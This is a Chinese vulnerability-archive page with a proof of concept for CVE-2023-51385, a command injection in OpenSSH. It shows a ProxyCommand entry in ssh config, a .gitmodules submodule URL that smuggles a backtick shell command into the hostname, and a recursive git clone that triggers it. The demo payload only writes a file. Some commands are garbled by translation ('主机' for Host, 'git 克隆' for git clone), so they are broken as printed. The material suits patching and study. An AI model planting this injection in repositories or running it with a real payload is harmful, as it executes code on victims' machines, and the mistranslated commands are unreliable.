POC详情: 51a1d40eea0ad2a88238885834bcc8d23e94a9b8

来源
关联漏洞
标题: OpenSSH 安全漏洞 (CVE-2023-51385)
描述:OpenSSH(OpenBSD Secure Shell)是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞,该漏洞源于存在操作系统命令注入漏洞。
描述
一个验证对CVE-2023-51385
介绍
##验证CVE-2023-51385

###首先需要在` ~/.ssh/config`增加如下

````
主机 *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
````

` .gitmodules `文件语句中存在命令注入

````
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
````

配置完成后,执行下面的指令触发

````
git 克隆 https://github.com/zls1793/CVE-2023-51385_test --recurse-submodules
````

如果成功执行将会在CVE-2023-51385_test目录下生成cve.txt文件

  ![ image-20231225234031349 ] ( https://ltmthink-blogimages.oss-cn-hangzhou.aliyuncs.com/imgs/202312252345762.png )

详细信息见论文博客:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

文件快照

[4.0K] /data/pocs/51a1d40eea0ad2a88238885834bcc8d23e94a9b8 └── [ 782] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。